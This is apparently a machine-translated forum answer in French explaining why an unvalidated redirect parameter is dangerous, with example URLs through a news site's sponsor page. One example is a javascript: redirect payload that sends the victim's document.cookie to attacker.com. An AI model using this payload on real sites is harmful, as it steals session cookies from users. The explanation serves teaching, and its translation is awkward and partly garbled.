C'est un gros problème. Si je vous envoie un lien qui ressemble à ceci:
http://cnn.com/sponsor.php?redirectpage=http://bit.ly/jh2l14
Vous allez penser « Oh, CNN, qui est un site légitime », et vous l'ouvrir et cliquez sur le « Continuer à votre page » lien. Et puis vous serez sur l'un des sites porno les plus méchants sur le net et il aura une voix d'homme géant en plein essor annonçant à tous vos collègues "Hot Damn je veux! @ $ @ # $ Votre! (& ¤ &^§ $ jusqu'à ce que je ne peux pas ¡⌐^(! # ~~ & $^#! @ $ !! "et vous devrez expliquer à votre patron "Je pensais que c'était CNN!"
Le trou ici est votre réputation. aveugles réoriente
comme celui-ci sont dangereux. Et c'est juste un trou. Comment cela?
http://cnn.com/sponsor.php?redirectpage=javascript:location.href='http://attacker.com/' + document.cookie
Maintenant, j'ai XSS-ed votre site et volé les cookies de votre utilisateur. Bien sûr, vous dites qu'il n'y a pas d'informations de connexion, mais qu'en est-il des données de session? Ou lorsque vous ajoutez un identifiant plus tard, ou quelqu'un d'autre dans votre entreprise utilise cette page un an plus tard où les utilisateurs sont connectés.
S'il n'y a pas de connexion sur l'un ou l'autre site, il n'y a pas de problème de sécurité. – NotMe